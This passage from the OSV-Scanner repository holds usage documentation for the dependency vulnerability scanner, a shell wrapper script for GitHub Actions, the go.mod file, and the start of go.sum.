`gems.locked` | | Rust | `Cargo.lock` | ## C/C++ scanning With the addition of [vulnerable commit ranges](https://osv.dev/blog/posts/introducing-broad-c-c++-support/) to the OSV.dev database, OSV-Scanner now supports vendored and submoduled C/C++ dependencies. Because the C/C++ ecosystem does not have a centralized package manager, C/C++ dependencies tend to be bundled with the project. Dependencies are either [submoduled](#submoduled-dependencies) or [vendored](#vendored-dependencies). In either case, OSV-Scanner is able to find known vulnerabilities in your project dependencies. OSV-Scanner's C/C++ support is based on commit-level data. OSV's commit-level data covers the majority of C/C++ vulnerabilities within the OSV database, but users should be aware that some vulnerabilities in their dependencies may be missing from OSV-Scanner results. Adding more commit-level data to the database is an ongoing project. ### Submoduled dependencies Submoduled dependencies are included in the project folder and retain their Git histories. To scan a C/C++ project with submoduled dependencies: 1. Navigate to the root folder of your project. 2. Ensure that your submodules are up to date using `git submodule update`. 3. Run the scanner using `osv-scanner -r .`. ### Vendored dependencies Vendored dependencies have been directly copied into the project folder, but do not retain their Git histories. OSV-Scanner uses OSV's [determineversion API](https://google.github.io/osv.dev/post-v1-determineversion/) to estimate each dependency's version (and associated Git Commit). Vulnerabilities for the estimated version are returned. This process requires no additional work from the user. Run OSV-Scanner as you normally would. ## Transitive dependency scanning OSV-Scanner supports transitive dependency scanning for Maven pom.xml. This feature is enabled by default when scanning, but it can be disabled using the `--no-resolve` flag. 
It is also disabled in the [offline mode](./offline-mode.md). OSV-Scanner uses [deps.dev’s resolver library](https://pkg.go.dev/deps.dev/util/resolve) to compute the dependency graph of a project. This graph includes all the direct and transitive dependencies. By default, [deps.dev API](https://docs.deps.dev/api/v3/index.html) is queried for package versions and requirements. Support for querying Maven Central and private registries is also available. After the dependency resolution, the OSV database is queried for the vulnerabilities associated with these dependencies as usual. {: .note } Test dependencies are not supported yet in the computed dependency graph for Maven pom.xml. ### Data source By default, we use the [deps.dev API](https://docs.deps.dev/api/v3/) to find version and dependency information of packages during transitive scanning. If instead you'd like to fetch data from [Maven Central](https://repo.maven.apache.org/maven2/), you can use the `--data-source=native` flag. If your project uses mirrored or private registries, in addition to setting `--data-source=native`, you will need to use the `--maven-registry=` flag to specify the registry (e.g. `--maven-registry=https://repo.maven.apache.org/maven2/`). ## Custom Lockfiles If you have a custom lockfile that we do not support or prefer to do your own custom parsing, you can extract the custom lockfile information and create a custom intermediate file containing dependency information so that osv-scanner can still check for vulnerabilities. Once you extracted your own dependency information, place it in a `osv-scanner.json` file, with the same format as the JSON output of osv-scanner, e.g.: ```jsonc { "results": [ { "packages": [ { "package": { "name": "github.com/repo/url", "commit": "9a6bd55c9d0722cb101fe85a3b22d89e4ff4fe52" } }, { "package": { "name": "react", "version": "1.2.3", "ecosystem": "npm" } } // ... 
] } ] } ``` Then pass this to `osv-scanner` with this: ``` osv-scanner --lockfile osv-scanner:/path/to/osv-scanner.json ``` For automatic scan detection, you can create an `osv-scanner-custom.json` file using the same procedure described above for `osv-scanner.json`. Run the command below for detection: ``` ./osv-scanner scan source -r /path/to/folder/you/want/to/scan ``` ### Known limitations When scanning a file in the `osv-scanner.json` format, using the `--format=spdx` flag produces incorrect output. For more details, see issue [#2192](https://github.com/google/osv-scanner/issues/2192). ================================================ FILE: docs/usage.md ================================================ --- layout: page permalink: /usage/ nav_order: 4 --- # Usage {: .note } This documentation is for the V2 release. For the older, V1 release documentation, check out . {: .no_toc }
Table of contents {: .text-delta } - TOC {:toc}
## Core Concept OSV-Scanner operates in a two-step process: 1. **Package Extraction**: The tool first extracts information about the packages used in your project, container image, or other target. 2. **Vulnerability Matching**: The extracted package information is then matched against known vulnerability databases to identify potential security issues. ## Subcommands OSV-Scanner V2 is divided into several subcommands: | Subcommand | Documentation Link | Quick Example | | ------------- | ---------------------------------------------------- | ---------------------------------------------------------------------- | | `scan` | [Further down this page](./usage.md#scan-subcommand) | `osv-scanner scan -r ./my-project-dir/` | | `scan source` | [Source Project Scanning](./scan-source.md) | Source scanning is default, so the example is the same as above. | | `scan image` | [Container Scanning](./scan-image.md) | `osv-scanner scan image my-docker-img:latest` | | `fix` | [Guided Remediation](./guided-remediation.md) | `osv-scanner fix -M path/to/package.json -L path/to/package-lock.json` | ### The `scan` Subcommand The `scan` subcommand is the primary way to initiate vulnerability scans. It has two subcommands of its own: `source` (default) and `image`. - **`scan source`**: Scans source code directories for package dependencies and vulnerabilities. See the [Scanning Source documentation](./scan-source.md) for more details. - **`scan image`**: Scans container images for vulnerabilities. See the [Scanning Container Images documentation](./scan-image.md) for more details. Both `scan source` and `scan image` share a common set of flags for configuring the scan and output. 
## Post-Extraction Flags ### Saving to File The `--output-file` flag can be used to save the scan results to a file instead of being printed on the stdout: ```bash osv-scanner scan -L package-lock.json --output-file scan-results.txt ``` ### Setting Output Format The `--format` flag can be used to specify the output format osv-scanner gives. See [Output](./output.md) page for more details. ```bash osv-scanner scan -L package-lock.json --format json ``` ### Override config file The `--config` flag can be used to specify a global config override to apply to all the files you are scanning. See [Config](./configuration.md) for more details. ```bash osv-scanner scan -L package-lock.json --config ./my-osv-scanner-config.toml ``` ### Set verbosity level The `--verbosity` flag can be used to set the verbosity level. See `--help` output for possible levels. ```bash osv-scanner scan -L package-lock.json --verbosity info ``` ### Serve HTML report locally The `--serve` flag is a helper flag to set the output format to HTML, and serve the report locally on port 8000. ```bash osv-scanner scan -L package-lock.json --serve ``` ### Offline vulnerability match The `--offline-vulnerabilities` flag can be used to check for vulnerabilities using local databases that are already cached ```bash osv-scanner --offline-vulnerabilities --download-offline-databases ./path/to/your/dir ``` See [offline vulnerabilities](./offline-mode.md) for more details. ### Licenses scanning The `--licenses` flag can be used to report license violations based on an allowlist ```bash # Show license summary only osv-scanner --licenses path/to/repository # Show the license summary and violations against an allowlist (provide the list after the = sign): osv-scanner --licenses="comma-separated list of allowed licenses" path/to/directory ``` See [licenses scanning](./license-scanning.md) for more details. 
### Show all packages The `--all-packages` flag can be used to output all packages in JSON format (make sure to set `--format=json`). Note that the `PackageOverrides` configuration, specifically the `ignore` action, takes precedence over this flag. See [configuration](./configuration.md#override-packages) for more details. ```bash osv-scanner --all-packages --format=json path/to/repository ``` ### Other features Several other features are available through flags. See their respective documentation pages for more details: - `--no-resolve`: Disables [transitive dependency resolution](./supported_languages_and_lockfiles.md#transitive-dependency-scanning). ## Pre-Commit Integration OSV-Scanner can be integrated as a [pre-commit](https://pre-commit.com) hook in your project. 1. Add the `osv-scanner` hook to your `.pre-commit-config.yaml` file. 2. Use the `args` key to pass command-line arguments as you would when running OSV-Scanner directly. 3. Verify your configuration with: ```bash pre-commit run --all-files --verbose osv-scanner ``` ### Examples ```yaml # Scan the current directory. repos: - repo: https://github.com/google/osv-scanner/ rev: v2.2.4 hooks: - id: osv-scanner # Scan the current directory, this equivalent as the previous one, but with custom # user defined arguments. The arguments (`args` key) are the defaults. repos: - repo: https://github.com/google/osv-scanner/ rev: v2.2.4 hooks: - id: osv-scanner args: - "scan" - "source" - "--format=vertical" - "--verbosity=error" - "--recursive" - "." # replace with your chosen directory or lock file # Scan a container image. The `docker` command should be present in your PATH. 
repos: - repo: https://github.com/google/osv-scanner/ rev: v2.2.4 hooks: - id: osv-scanner args: - "scan" - "image" - "--format=vertical" - "--verbosity=error" - "debian:trixie" # replace with your chosen image (the tag is mandatory) ``` ## Running in a Docker Container The OSV-Scanner Docker image can be pulled from the GitHub Container Registry: ```bash docker pull ghcr.io/google/osv-scanner:latest ``` Once you have the image, you can test that it works by running: ```bash docker run ghcr.io/google/osv-scanner -h ``` To run a scan, mount the directory to scan to `/src` and pass the necessary flags: ```bash docker run -v ${PWD}:/src ghcr.io/google/osv-scanner -L /src/go.mod ``` ================================================ FILE: exit_code_redirect.sh ================================================ #!/bin/bash # Copyright 2023 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
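# This script works around a limitation of GitHub Actions, where an action
# cannot receive a variable number of arguments in an array.
# It takes the last argument, splits it on whitespace (newlines included) and
# passes the pieces to osv-scanner as separate arguments. Any arguments before
# the last one are forwarded to osv-scanner unchanged.

# Get the total number of arguments
total_args=$#

# Everything before the last argument is kept as an array, so each argument
# stays a single word when forwarded and can be inspected individually below.
# (A plain `args=${@:...}` assignment would collapse them into one string.)
args=()
last_arg=""
if [[ $total_args -gt 0 ]]; then
  # Extract the last argument
  last_arg="${!total_args}"

  # Remove the last argument from the list
  args=("${@:1:$((total_args - 1))}")
fi

# Split the last argument on whitespace. `read -a` performs word splitting
# without pathname expansion, so a piece such as `*` reaches osv-scanner
# literally and file names in the working directory can never turn into
# extra osv-scanner arguments.
split_args=()
read -r -d '' -a split_args <<<"$last_arg"

# Full argument list handed to osv-scanner; the flag check below looks at the
# same list, so flags supplied through the last argument are seen as well.
scanner_args=("${args[@]}" "${split_args[@]}")

# Execute osv-scanner with the provided arguments
osv-scanner "${scanner_args[@]}"

# Store the exit code
exit_code=$?

echo "Exit code: ${exit_code}"

# don't error if there are no lockfiles found
# NOTE(review): rewriting 128 to 0 means a run that found nothing to scan is
# reported as success. Pipelines that use this script as a gate can pass
# --allow-no-lockfiles=false to keep the failing exit code.
if [[ $exit_code -eq 128 ]]; then
  # if the "--allow-no-lockfiles" flag has not been used, print a deprecation warning
  using_new_flag="no"

  for value in "${scanner_args[@]}"; do
    if [[ "$value" = "--allow-no-lockfiles" ]] ||
      [[ "$value" = "-allow-no-lockfiles" ]] ||
      [[ "$value" = "-allow-no-lockfiles=true" ]] ||
      [[ "$value" = "--allow-no-lockfiles=true" ]]; then
      using_new_flag="yes"
    fi

    # An explicit "=false" asks for the failure to be kept: exit with 128.
    if [[ "$value" = "-allow-no-lockfiles=false" ]] ||
      [[ "$value" = "--allow-no-lockfiles=false" ]]; then
      exit "$exit_code"
    fi
  done

  if [[ $using_new_flag = "no" ]]; then
    echo "deprecation warning: please use the --allow-no-lockfiles flag if you don't want this action to error when there are no lockfiles"

    # Only emit the workflow warning command when the CI variable is set.
    if [[ -n "$CI" ]]; then
      echo "::warning::No lockfiles found. Please use the --allow-no-lockfiles flag to suppress this warning."
    fi
  fi

  exit_code=0
fi

# Exit with the modified exit code
exit "$exit_code"

================================================ FILE: go.mod ================================================ module github.com/google/osv-scanner/v2 go 1.26.1 require ( charm.land/bubbles/v2 v2.0.0 charm.land/bubbletea/v2 v2.0.1 charm.land/glamour/v2 v2.0.0 charm.land/lipgloss/v2 v2.0.1 deps.dev/api/v3 v3.0.0-20260225225317-765e10b45d5b deps.dev/api/v3alpha v0.0.0-20260225225317-765e10b45d5b deps.dev/util/maven v0.0.0-20260225225317-765e10b45d5b deps.dev/util/resolve v0.0.0-20260225225317-765e10b45d5b deps.dev/util/semver v0.0.0-20260225225317-765e10b45d5b github.com/BurntSushi/toml v1.6.0 github.com/CycloneDX/cyclonedx-go v0.10.0 github.com/gkampitakis/go-snaps v0.5.20 github.com/go-git/go-git/v5 v5.17.0 github.com/gobwas/glob v0.2.3 github.com/goccy/go-yaml v1.19.2 github.com/google/go-cmp v0.7.0 github.com/google/osv-scalibr v0.4.6-0.20260318175007-ec4239d68fb9 github.com/ianlancetaylor/demangle v0.0.0-20251118225945-96ee0021ea0f github.com/jedib0t/go-pretty/v6 v6.7.8 github.com/modelcontextprotocol/go-sdk v1.4.1 github.com/muesli/reflow v0.3.0 github.com/opencontainers/go-digest v1.0.0 github.com/ossf/osv-schema/bindings/go v0.0.0-20260304051245-ec3272c283e4 github.com/owenrumney/go-sarif/v3 v3.3.0 github.com/package-url/packageurl-go v0.1.5 github.com/pandatix/go-cvss v0.6.2 github.com/tidwall/gjson v1.18.0 github.com/tidwall/pretty v1.2.1 github.com/tidwall/sjson v1.2.5 github.com/urfave/cli/v3 v3.7.0 go.yaml.in/yaml/v3 v3.0.4 go.yaml.in/yaml/v4 v4.0.0-rc.4 golang.org/x/net v0.51.0 golang.org/x/sync v0.20.0 golang.org/x/term v0.40.0 golang.org/x/vuln v1.1.4 google.golang.org/grpc v1.79.3 google.golang.org/protobuf v1.36.11 gopkg.in/dnaeon/go-vcr.v4 v4.0.6 gopkg.in/ini.v1 v1.67.1 osv.dev/bindings/go v0.0.0-20260306051416-1f963c5a9f4f ) require ( bitbucket.org/creachadair/stringset v0.0.14 // indirect cloud.google.com/go/compute/metadata v0.9.0 // indirect cyphar.com/go-pathrs v0.2.1 // 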
indirect dario.cat/mergo v1.0.2 // indirect deps.dev/util/pypi v0.0.0-20250903005441-604c45d5b44b // indirect github.com/AdaLogics/go-fuzz-headers v0.0.0-20240806141605-e8a1dd7889d6 // indirect github.com/AdamKorcz/go-118-fuzz-build v0.0.0-20250520111509-a70c2aa677fa // indirect github.com/GehirnInc/crypt v0.0.0-20230320061759-8cc1b52080c5 // indirect github.com/Microsoft/go-winio v0.6.2 // indirect github.com/Microsoft/hcsshim v0.13.0 // indirect github.com/ProtonMail/go-crypto v1.3.0 // indirect github.com/aead/serpent v0.0.0-20160714141033-fba169763ea6 // indirect github.com/agext/levenshtein v1.2.3 // indirect github.com/alecthomas/chroma/v2 v2.19.0 // indirect github.com/anchore/go-lzo v0.1.0 // indirect github.com/anchore/go-struct-converter v0.0.0-20250211213226-cce56d595160 // indirect github.com/atotto/clipboard v0.1.4 // indirect github.com/aymerick/douceur v0.2.0 // indirect github.com/bazelbuild/buildtools v0.0.0-20250826111327-4006b543a694 // indirect github.com/cespare/xxhash/v2 v2.3.0 // indirect github.com/charmbracelet/colorprofile v0.4.2 // indirect github.com/charmbracelet/ultraviolet v0.0.0-20260205113103-524a6607adb8 // indirect github.com/charmbracelet/x/ansi v0.11.6 // indirect github.com/charmbracelet/x/exp/slice v0.0.0-20250711012602-b1f986320f7e // indirect github.com/charmbracelet/x/term v0.2.2 // indirect github.com/charmbracelet/x/termios v0.1.1 // indirect github.com/charmbracelet/x/windows v0.2.2 // indirect github.com/clipperhouse/displaywidth v0.11.0 // indirect github.com/clipperhouse/uax29/v2 v2.7.0 // indirect github.com/cloudflare/circl v1.6.3 // indirect github.com/compose-spec/compose-go/v2 v2.8.1 // indirect github.com/containerd/cgroups/v3 v3.0.5 // indirect github.com/containerd/containerd v1.7.29 // indirect github.com/containerd/containerd/api v1.9.0 // indirect github.com/containerd/continuity v0.4.5 // indirect github.com/containerd/errdefs v1.0.0 // indirect github.com/containerd/errdefs/pkg v0.3.0 // indirect 
github.com/containerd/fifo v1.1.0 // indirect github.com/containerd/log v0.1.0 // indirect github.com/containerd/platforms v1.0.0-rc.1 // indirect github.com/containerd/stargz-snapshotter/estargz v0.16.3 // indirect github.com/containerd/ttrpc v1.2.7 // indirect github.com/containerd/typeurl/v2 v2.2.3 // indirect github.com/cyphar/filepath-securejoin v0.6.0 // indirect github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc // indirect github.com/deitch/magic v0.0.0-20240306090643-c67ab88f10cb // indirect github.com/diskfs/go-diskfs v1.7.0 // indirect github.com/distribution/reference v0.6.0 // indirect github.com/djherbis/times v1.6.0 // indirect github.com/dlclark/regexp2 v1.11.5 // indirect github.com/docker/cli v29.2.0+incompatible // indirect github.com/docker/distribution v2.8.3+incompatible // indirect github.com/docker/docker v28.3.3+incompatible // indirect github.com/docker/docker-credential-helpers v0.9.3 // indirect github.com/docker/go-connections v0.5.0 // indirect github.com/docker/go-events v0.0.0-20250114142523-c867878c5e32 // indirect github.com/docker/go-units v0.5.0 // indirect github.com/dsoprea/go-exfat v0.0.0-20190906070738-5e932fbdb589 // indirect github.com/dsoprea/go-logging v0.0.0-20200710184922-b02d349568dd // indirect github.com/dustin/go-humanize v1.0.1 // indirect github.com/edsrzf/mmap-go v1.2.0 // indirect github.com/elliotwutingfeng/asciiset v0.0.0-20230602022725-51bbb787efab // indirect github.com/emirpasic/gods v1.18.1 // indirect github.com/erikvarga/go-rpmdb v0.0.0-20250523120114-a15a62cd4593 // indirect github.com/felixge/httpsnoop v1.0.4 // indirect github.com/gkampitakis/ciinfo v0.3.2 // indirect github.com/go-errors/errors v1.0.2 // indirect github.com/go-git/gcfg v1.5.1-0.20230307220236-3a3c6141e376 // indirect github.com/go-git/go-billy/v5 v5.8.0 // indirect github.com/go-logr/logr v1.4.3 // indirect github.com/go-logr/stdr v1.2.2 // indirect github.com/go-ole/go-ole v1.2.6 // indirect 
github.com/go-restruct/restruct v1.2.0-alpha // indirect github.com/go-viper/mapstructure/v2 v2.4.0 // indirect github.com/gogo/protobuf v1.3.2 // indirect github.com/golang/groupcache v0.0.0-20241129210726-2c02b8208cf8 // indirect github.com/google/go-containerregistry v0.20.6 // indirect github.com/google/jsonschema-go v0.4.2 // indirect github.com/google/uuid v1.6.0 // indirect github.com/gorilla/css v1.0.1 // indirect github.com/icholy/digest v1.1.0 // indirect github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99 // indirect github.com/kevinburke/ssh_config v1.2.0 // indirect github.com/klauspost/compress v1.18.0 // indirect github.com/kr/pretty v0.3.1 // indirect github.com/kr/text v0.2.0 // indirect github.com/lucasb-eyer/go-colorful v1.3.0 // indirect github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40 // indirect github.com/maruel/natural v1.1.1 // indirect github.com/masahiro331/go-ext4-filesystem v0.0.0-20240620024024-ca14e6327bbd // indirect github.com/mattn/go-isatty v0.0.20 // indirect github.com/mattn/go-runewidth v0.0.20 // indirect github.com/mattn/go-shellwords v1.0.12 // indirect github.com/microcosm-cc/bluemonday v1.0.27 // indirect github.com/micromdm/plist v0.2.1 // indirect github.com/mitchellh/go-homedir v1.1.0 // indirect github.com/moby/buildkit v0.23.2 // indirect github.com/moby/docker-image-spec v1.3.1 // indirect github.com/moby/locker v1.0.1 // indirect github.com/moby/sys/mountinfo v0.7.2 // indirect github.com/moby/sys/sequential v0.6.0 // indirect github.com/moby/sys/signal v0.7.1 // indirect github.com/moby/sys/user v0.4.0 // indirect github.com/moby/sys/userns v0.1.0 // indirect github.com/muesli/cancelreader v0.2.2 // indirect github.com/ncruces/go-strftime v0.1.9 // indirect github.com/opencontainers/image-spec v1.1.1 // indirect github.com/opencontainers/runtime-spec v1.2.1 // indirect github.com/opencontainers/selinux v1.13.0 // indirect github.com/pierrec/lz4/v4 v4.1.17 // indirect 
github.com/pjbgf/sha1cd v0.4.0 // indirect github.com/pkg/errors v0.9.1 // indirect github.com/pkg/xattr v0.4.9 // indirect github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 // indirect github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec // indirect github.com/rivo/uniseg v0.4.7 // indirect github.com/rogpeppe/go-internal v1.14.1 // indirect github.com/rust-secure-code/go-rustaudit v0.0.0-20250226111315-e20ec32e963c // indirect github.com/saferwall/pe v1.5.7 // indirect github.com/sahilm/fuzzy v0.1.1 // indirect github.com/santhosh-tekuri/jsonschema/v6 v6.0.1 // indirect github.com/secDre4mer/pkcs7 v0.0.0-20240322103146-665324a4461d // indirect github.com/segmentio/asm v1.1.3 // indirect github.com/segmentio/encoding v0.5.4 // indirect github.com/sergi/go-diff v1.4.0 // indirect github.com/shirou/gopsutil v3.21.11+incompatible // indirect github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af // indirect github.com/skeema/knownhosts v1.3.1 // indirect github.com/spdx/gordf v0.0.0-20250128162952-000978ccd6fb // indirect github.com/spdx/tools-golang v0.5.5 // indirect github.com/thoas/go-funk v0.9.3 // indirect github.com/tidwall/jsonc v0.3.2 // indirect github.com/tidwall/match v1.1.1 // indirect github.com/tink-crypto/tink-go/v2 v2.4.0 // indirect github.com/tklauser/go-sysconf v0.3.15 // indirect github.com/tklauser/numcpus v0.10.0 // indirect github.com/tonistiigi/go-csvvalue v0.0.0-20240814133006-030d3b2625d0 // indirect github.com/ulikunitz/xz v0.5.15 // indirect github.com/vbatts/tar-split v0.12.1 // indirect github.com/xanzy/ssh-agent v0.3.3 // indirect github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb // indirect github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 // indirect github.com/xeipuuv/gojsonschema v1.2.0 // indirect github.com/xhit/go-str2duration/v2 v2.1.0 // indirect github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect 
github.com/yosida95/uritemplate/v3 v3.0.2 // indirect github.com/yuin/goldmark v1.7.12 // indirect github.com/yuin/goldmark-emoji v1.0.6 // indirect github.com/yusufpapurcu/wmi v1.2.4 // indirect go.etcd.io/bbolt v1.4.2 // indirect go.opencensus.io v0.24.0 // indirect go.opentelemetry.io/auto/sdk v1.2.1 // indirect go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 // indirect go.opentelemetry.io/otel v1.39.0 // indirect go.opentelemetry.io/otel/metric v1.39.0 // indirect go.opentelemetry.io/otel/trace v1.39.0 // indirect go.uber.org/atomic v1.7.0 // indirect go.uber.org/multierr v1.11.0 // indirect go.uber.org/zap v1.17.0 // indirect go.yaml.in/yaml/v2 v2.4.2 // indirect golang.org/x/crypto v0.48.0 // indirect golang.org/x/exp v0.0.0-20250711185948-6ae5c78190dc // indirect golang.org/x/mod v0.32.0 // indirect golang.org/x/oauth2 v0.34.0 // indirect golang.org/x/sys v0.42.0 // indirect golang.org/x/telemetry v0.0.0-20260109210033-bd525da824e2 // indirect golang.org/x/text v0.34.0 // indirect golang.org/x/tools v0.41.0 // indirect golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da // indirect google.golang.org/genproto v0.0.0-20250707201910-8d1bb00bc6a7 // indirect google.golang.org/genproto/googleapis/api v0.0.0-20260226221140-a57be14db171 // indirect google.golang.org/genproto/googleapis/rpc v0.0.0-20260217215200-42d3e9bedb6d // indirect gopkg.in/warnings.v0 v0.1.2 // indirect gopkg.in/yaml.v3 v3.0.1 // indirect modernc.org/libc v1.66.3 // indirect modernc.org/mathutil v1.7.1 // indirect modernc.org/memory v1.11.0 // indirect modernc.org/sqlite v1.38.0 // indirect sigs.k8s.io/yaml v1.6.0 // indirect www.velocidex.com/golang/go-ntfs v0.2.0 // indirect www.velocidex.com/golang/regparser v0.0.0-20250203141505-31e704a67ef7 // indirect ) ================================================ FILE: go.sum ================================================ bitbucket.org/creachadair/stringset v0.0.14 h1:t1ejQyf8utS4GZV/4fM+1gvYucggZkfhb+tMobDxYOE= 
bitbucket.org/creachadair/stringset v0.0.14/go.mod h1:Ej8fsr6rQvmeMDf6CCWMWGb14H9mz8kmDgPPTdiVT0w= charm.land/bubbles/v2 v2.0.0 h1:tE3eK/pHjmtrDiRdoC9uGNLgpopOd8fjhEe31B/ai5s= charm.land/bubbles/v2 v2.0.0/go.mod h1:rCHoleP2XhU8um45NTuOWBPNVHxnkXKTiZqcclL/qOI= charm.land/bubbletea/v2 v2.0.1 h1:B8e9zzK7x9JJ+XvHGF4xnYu9Xa0E0y0MyggY6dbaCfQ= charm.land/bubbletea/v2 v2.0.1/go.mod h1:3LRff2U4WIYXy7MTxfbAQ+AdfM3D8Xuvz2wbsOD9OHQ= charm.land/glamour/v2 v2.0.0 h1:IDBoqLEy7Hdpb9VOXN+khLP/XSxtJy1VsHuW/yF87+U= charm.land/glamour/v2 v2.0.0/go.mod h1:kjq9WB0s8vuUYZNYey2jp4Lgd9f4cKdzAw88FZtpj/w= charm.land/lipgloss/v2 v2.0.1 h1:6Xzrn49+Py1Um5q/wZG1gWgER2+7dUyZ9XMEufqPSys= charm.land/lipgloss/v2 v2.0.1/go.mod h1:KjPle2Qd3YmvP1KL5OMHiHysGcNwq6u83MUjYkFvEkM= cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw= cloud.google.com/go/compute/metadata v0.9.0 h1:pDUj4QMoPejqq20dK0Pg2N4yG9zIkYGdBtwLoEkH9Zs= cloud.google.com/go/compute/metadata v0.9.0/go.mod h1:E0bWwX5wTnLPedCKqk3pJmVgCBSM6qQI1yTBdEb3C10= cyphar.com/go-pathrs v0.2.1 h1:9nx1vOgwVvX1mNBWDu93+vaceedpbsDqo+XuBGL40b8= cyphar.com/go-pathrs v0.2.1/go.mod h1:y8f1EMG7r+hCuFf/rXsKqMJrJAUoADZGNh5/vZPKcGc= dario.cat/mergo v1.0.2 h1:85+piFYR1tMbRrLcDwR18y4UKJ3aH1Tbzi24VRW1TK8= dario.cat/mergo v1.0.2/go.mod h1:E/hbnu0NxMFBjpMIE34DRGLWqDy0g5FuKDhCb31ngxA= deps.dev/api/v3 v3.0.0-20260225225317-765e10b45d5b h1:NfcHjM/zoNS7fQsEkpms4iDeDeDN0epSc85v9E8URHA= deps.dev/api/v3 v3.0.0-20260225225317-765e10b45d5b/go.mod h1:+gN+ydvfcDk/mTxWon7Ze4X8gYN/HZxUdt54XWgWcRQ= deps.dev/api/v3alpha v0.0.0-20260225225317-765e10b45d5b h1:rLNtxOQmnJ4tBpU1RdZAAF8I5S/VLBEnjxE8qINO9RM= deps.dev/api/v3alpha v0.0.0-20260225225317-765e10b45d5b/go.mod h1:gZ4p6jKUfgFWBPgK32TByXK59A+sDp9plnb7sz7VmxQ= deps.dev/util/maven v0.0.0-20260225225317-765e10b45d5b h1:sfRt80paU8Awo8LlaULg1EovlaVqIi4uO12NaEQhISk= deps.dev/util/maven v0.0.0-20260225225317-765e10b45d5b/go.mod h1:eGrXziwI7scSGrwIj+5EBHtTeSxAZD/yi8Hb3nFXesA= deps.dev/util/pypi 
v0.0.0-20250903005441-604c45d5b44b h1:67FfxwUt82PEMle2FKlW4DZvzcfSODDoTnSGOT1bYtY= deps.dev/util/pypi v0.0.0-20250903005441-604c45d5b44b/go.mod h1:qmA0z/Lsfa1FMtuLd9JmVZLMHR3GBX/EmbM6z1X3EDU= deps.dev/util/resolve v0.0.0-20260225225317-765e10b45d5b h1:1B0TKabhNud7PlSakdDVtZlLR9S69nfxdSGQJFq44Ao= deps.dev/util/resolve v0.0.0-20260225225317-765e10b45d5b/go.mod h1:u4+2T3Dt2jsbUnWEngaKJYtZuBHN2wSVupHnZcqQvy4= deps.dev/util/semver v0.0.0-20260225225317-765e10b45d5b h1:NAN/jQ0J56JgMqvzt2Ht9i/RQm0GUCi8wHY3TnXt02k= deps.dev/util/semver v0.0.0-20260225225317-765e10b45d5b/go.mod h1:jjJweVqtuMQ7Q4zlTQ/kCHpboojkRvpMYlhy/c93DVU= github.com/AdaLogics/go-fuzz-headers v0.0.0-20240806141605-e8a1dd7889d6 h1:He8afgbRMd7mFxO99hRNu+6tazq8nFF9lIwo9JFroBk= github.com/AdaLogics/go-fuzz-headers v0.0.0-20240806141605-e8a1dd7889d6/go.mod h1:8o94RPi1/7XTJvwPpRSzSUedZrtlirdB3r9Z20bi2f8= github.com/AdamKorcz/go-118-fuzz-build v0.0.0-20250520111509-a70c2aa677fa h1:x6kFzdPgBoLbyoNkA/jny0ENpoEz4wqY8lPTQL2DPkg= github.com/AdamKorcz/go-118-fuzz-build v0.0.0-20250520111509-a70c2aa677fa/go.mod h1:gCLVsLfv1egrcZu+GoJATN5ts75F2s62ih/457eWzOw= github.com/Azure/go-ansiterm v0.0.0-20250102033503-faa5f7b0171c h1:udKWzYgxTojEKWjV8V+WSxDXJ4NFATAsZjh8iIbsQIg= github.com/Azure/go-ansiterm v0.0.0-20250102033503-faa5f7b0171c/go.mod h1:xomTg63KZ2rFqZQzSB4Vz2SUXa1BpHTVz9L5PTmPC4E= github.com/BurntSushi/toml v0.3.1/go.mod h1:xHWCNGjB5oqiDr8zfno3MHue2Ht5sIBksp03qcyfWMU= github.com/BurntSushi/toml v1.6.0 h1:dRaEfpa2VI55EwlIW72hMRHdWouJeRF7TPYhI+AUQjk= github.com/BurntSushi/toml v1.6.0/go.mod h1:ukJfTF/6rtPPRCnwkur4qwRxa8vTRFBF0uk2lLoLwho= github.com/CycloneDX/cyclonedx-go v0.10.0 h1:7xyklU7YD+CUyGzSFIARG18NYLsKVn4QFg04qSsu+7Y= github.com/CycloneDX/cyclonedx-go v0.10.0/go.mod h1:vUvbCXQsEm48OI6oOlanxstwNByXjCZ2wuleUlwGEO8= github.com/GehirnInc/crypt v0.0.0-20230320061759-8cc1b52080c5 h1:IEjq88XO4PuBDcvmjQJcQGg+w+UaafSy8G5Kcb5tBhI= github.com/GehirnInc/crypt v0.0.0-20230320061759-8cc1b52080c5/go.mod 
